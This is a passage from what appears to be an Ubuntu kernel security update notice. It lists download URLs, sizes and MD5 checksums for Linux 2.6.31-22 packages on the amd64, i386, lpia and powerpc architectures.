http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    38052 7f306f8d2cab050417d6cb38857b5d5a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:     5762 39e5dbb1081ba9537468d1a927fd0da2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    73772 a4bad6ca01c03a927453ad26b099cce4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    22250 53b93aabb270063d193571b49d95b9e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:     9538 29dde3870380ac336fbacaf92ba229ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    39852 7e7b6dc05ceb31ac128631131cc4d523
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    23488 023007868ca9edada0fb2c92805d9683
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:  1389890 cb421da7cd9f9dc1c2b7920d3cbd5d26
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    47372 76db327e946e56267ebb075149dd74d6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    51746 2d218a60e0c7df2b655e8dbde3b8fde0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   129008 8e259b2e63ad1b7540ab5e280fd1185b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    15818 bd77ac1c53d4013fd44d6e08e0607a0d

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-307-ec2_2.6.31-307.15_i386.deb
  Size/MD5:   583698 c74a1a2666674f9f7868022638a44eec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-307-ec2_2.6.31-307.15_i386.deb
  Size/MD5: 18098198 aa80a9877a0e8e66b3eaeedf106d2735
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   198856 75a1fabea67826c04b3f970855301f66
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    32460 debd7f409c0590fbf8c54e4bfd353b0a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    49946 a1fd0118b8702be8c81173ac13de49f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    42114 8ad595e8510acc850d85f2b15409c398
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    45944 fe33cb34669e234be9c67b10786438e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    87406 f8c4148cb3a8f30c7a59e5dae4771175
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    33766 fbea3cb1763e19feb0994cf8500132de
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   534130 2d58da5dee752af1baedeb14a08c5f96
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   128170 4723852ff55df632006c4927d13f114f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    49746 a976e85f8ee996273f27a347df71a409
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   295730 69eac5e852238c1a21440a9241b14832
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:  4196436 e5b97c5775a2511f10966890095da19f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-386_2.6.31-22.60_i386.deb
  Size/MD5:   685230 67f5b3274f3a20bb452797106ec9f137
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic-pae_2.6.31-22.60_i386.deb
  Size/MD5:   687020 7d21f4a09ce0a273cb6d7503e72ee6ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic_2.6.31-22.60_i386.deb
  Size/MD5:   686244 65573f1a4fa26cf1d025885ba2cebbbc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-386_2.6.31-22.60_i386.deb
  Size/MD5: 28823902 18b1320dcc9bc2283011911c04237711
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-generic-pae_2.6.31-22.60_i386.deb
  Size/MD5: 28958792 dc3e36f69d9881d9d26e8cd2c44800cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-generic_2.6.31-22.60_i386.deb
  Size/MD5: 28891678 aae1afae57ad58337b6454bb13ae72a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-virtual_2.6.31-22.60_i386.deb
  Size/MD5: 11300176 dc82553b7990534cc39f9f4cc4e00f87
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_i386.deb
  Size/MD5:   753460 b871864698fe96c8c053de1ab7d28b3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   172874 cf867621a1c6af7d2df0b32c31d47f3a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   186174 421f2c1b6a7a9211742bcd0116d5b16e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    28924 bf4c063e743601b1838970be5eb4665f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   292874 8b3015efe3f52550b68f137e72be5632
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:  2400172 d3a5e3e28a6f54f5ac55255fefe8d753
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   142002 863be5985847e2c869ccb738ea6eacf7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   189594 5451c54d33a9917ef47a39385a2d60a9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   148538 4f7e33f693ccc7d0fd540942fef72b5a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    35292 8faa6b0d2be91563e4f946a97752a550
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:     6840 152a8cf38c19823497507b9f3663df86
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    86104 cf1457aa150576d327043920a45cff27
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    46424 b2baacb7c5ffe63175430863e7d6878e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:     8918 9b41564f8be9827daa0254d9308ea154
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    36282 291e645259303b5c8802e64740569845
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    21668 467a00b25bb160d9e117fc910f31784a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:  1495340 ac8a383261c23880b7f2f98dc9ca0f97
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    44088 12d57d9e5921a6694e98f72cd661a89f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    48548 06ffbb6a1b5d63dd5187dc4c96d81004
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   117862 334d8feda1b33280c0c767eb59fc8941
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    14532 28a556e15bd25cacb435f06bc40de557

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   198816 cabad71083cee31770876846c9b3e5f0
http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    32446 6aff2bbc6e25c9ed6dfe471c79f9e63e
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    49948 a322353219ca799650b5726a6c06b1d6
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    42156 bb1c584d16c683ad60b94886115201bc
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    45934 ce7abfdde991057d5de236cc7c92dd06
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    87392 5a3de6c8b7e9f7789d180572b09dc2ff
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    33758 73cb370ad891451b4d0bc88705010ae2
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   534312 6deae522a3c870b57491d1da33d886bd
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   128220 9301688d4020d499ed969748cb732bdc
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    49750 c3fc2a64a7415c42a60be5284785ac0c
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   295734 7b6c3dfa99d318e9202a33348b0b7f40
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:  4197456 d122014f54ef4ab940dc19ec321d6286
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-lpia_2.6.31-22.60_lpia.deb
  Size/MD5:   684840 c139f2a52780e291cc978594db715c14
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-lpia_2.6.31-22.60_lpia.deb
  Size/MD5: 28892608 4bf6a29734b5aa254ca96d4c0f26ff29
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_lpia.deb
  Size/MD5:   753444 9e4b00e5d9f5a894ba2e088c3d15e280
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   172932 8478bc14f1f14a05a4e93b2356428c29
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   186154 49c9a729f5b7cd5f127d8f45437dd162
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    28912 267006f0a11aaf673cf8f3b3f3abaeb5
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   292858 7761b4f00c9257ce5b7873d76f1c5ea4
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:  2400346 e2ab63a68d1afb4b84de59722af76fad
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   141982 32b0be2ea446d44c0796ead47f311aed
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   189584 29474120e1018740d2cedd3c560d0c1f
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   148528 8a3914c5c04e9967f99d5b71f0630c22
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    35292 fc88bbd3fd4ada2002bdbb7dda4784bf
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:     6828 495fe0c7945276ad8055ff66aef0c870
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    86098 309c17f97610d6901a49ec7deee22282
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    46412 3a56ab298ad69fa20a59243dc90d91b3
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:     8900 dbb82fccbacffd5147b0a4ba42e73fb0
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    36270 f275023b9b741f5383a4adcb3c20d8fc
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    21666 a10e2c6899f03445dc3fd431b04e389b
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:  1495072 a60482e79efeafe8f7c5544b7aac4d25
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    44064 c5c8d43cdfedaf45b3bcb0ad5cebcf5e
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    48540 a81308e2c1a4e85467c70dc11586a35e
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   117832 0fdbb4919cd2f93e13304a484a76b890
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    14516 f87cbe777565bffc6791d917445a8ed2

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   321492 a6e3955497936e2d8d21d663f79217a8
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   263650 c39b24ef95a57138b0c8c29d8ebd1db1
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    58862 623da2e39d70d011def84a9876f404f7
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    67046 b7ef32e1debe5e3897b29bf892a205a3
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    45932 ad59fb0a080fbd3f0c54c489fc1a2b41
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    51298 255d5493db43cfcb76868955f47e11a6
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    90698 549cbf218bbe9b9ca431c42995dd0895
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   105162 f4a5cdf80fdb0d8b50b66266e2a67600
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    39486 1cc5b805673f1e8ca877d80199bd35be
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    39270 c80c6ee3f07888fa3c6f3c6147bf9a9c
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   581030 48870bec4d7c78fbc4d447935a7fed0a
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   626342 71f4768f5551e771ab87f2621da8097b
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   149306 ce090bfc2dd1317de4d461e605d74101
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   147320 b3947ba223bd39bce44748fb8a737100
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    79708 998771d5afc49f155a7a028446f0386a
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    84132 677a36642f9fa2d4ac4876e7c4c8588e
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   402940 f38251cc951d684a5052d3765152fdac
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   342490 bbb42db83979db7bddad061bd10c19a3
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:  3838604 3dc50a2b64f2864947576cfdb07c8ccd
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:  5223500 d454911ee6879d2a8e3e09ef756525a0
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc-smp_2.6.31-22.60_powerpc.deb
  Size/MD5:   795016 dc961bb4deb5e0f7cc8594d3b42fcccd
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc64-smp_2.6.31-22.60_powerpc.deb
  Size/MD5:   813182 cfdf6137c9db4ff068f8377641a6f994
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc_2.6.31-22.60_powerpc.deb
  Size/MD5:   794466 7098cc192d736432f69d6461b6b2f1e5
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-powerpc-smp_2.6.31-22.60_powerpc.deb
  Size/MD5: 24881134 d3a7996bfa4ca9d00ffa138e8af07a65
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-powerpc64-smp_2.6.31-22.60_powerpc.deb
  Size/MD5: 25859358 1896b217a23fecdef7fa4f4108b5a39d
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-powerpc_2.6.31-22.60_powerpc.deb
  Size/MD5: 24711328 090a1826d0b29376957bd285a00bec55
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_powerpc.deb
  Size/MD5:   738524 6a069b9d476c1302d17b59b97d9f5fef
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   272172 ed7a1d4d22a74235e0e945cd00618b3b
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   294756 b0fda03144d279b6d8c11ba4a151ff0b
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   210594 c2dbac3b914f766e9eef15e760579805
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   217030 6f3106804d19966c219d7f3ef60e7ec0
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    26370 4918a8a9b630381d08931f36e98a6ba3
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    29680 dbf2a64751a6b805c38a2671588cd55b
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   315082 c4cc05ae803543c34dbc5b84bb506fc6
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   357610 169b16c940142485d187019ae62dfba3
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:  2027744 72cac22305c06de13610f3e4cb732000
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:  2247756 eeac477bd4452047bd4e054438ce5ae1
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   213540 539abf10cc8075cff2aaeb7a5d2a4415
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   209828 07bf91d64a9c1ca41d847d1d45145859
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   210294 d03b6378e07b7d16a8060805d5a33a1e
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   244890 35b7664b5b7866124f07498565492550
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   111850 76a16b3ec983c1456a847b74b058c84d
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   131634 42b2955a56db91a6734e79fabe4b6eb7
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    49036 9f95af70a86ea344deb82828097f33ac
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    44086 d8d27fda02b3a2eccd1bb295513b0ae2
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:     5848 ca06ac8de8f328c81d274625018c28dc
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:     6510 19263161420a4414cca39b3e176ed1fe
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    79130 f9547fa7a009cfc1fdace53f207e66e0
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    85236 783f47a75d9e82f999273ae34ecb2bad
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    74332 09ced5601534f6721803bc936d4474a6
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    27270 8fca637189a591b726e81d9f759de81e
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:     8542 5e50b93423cef9abfa0e1224b0706042
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:     9816 645a211d3b5072ddfd2494355f612081
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    58820 d1e640be1163d46f9c4d30f16bc5d489
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    70146 df3e05fd190bbdee466474050abf6d4d
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    23716 df0ec1c32f484026626eba3aceee8bd0
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    30798 d34084fae6d01f175c520a7ee88ae885
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:  1557496 8b2c2babeeb812ff28154713e33b68fc
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:  1509500 140ca736b92247392b5f7a81c6112824
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    81652 2f7f7e13c32879ede7d9444b7d0d82c1
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    88506 eb5516ed210ea0daef38e35a63497716
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    64574 93994b13239fa750556d18cc981ead23
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
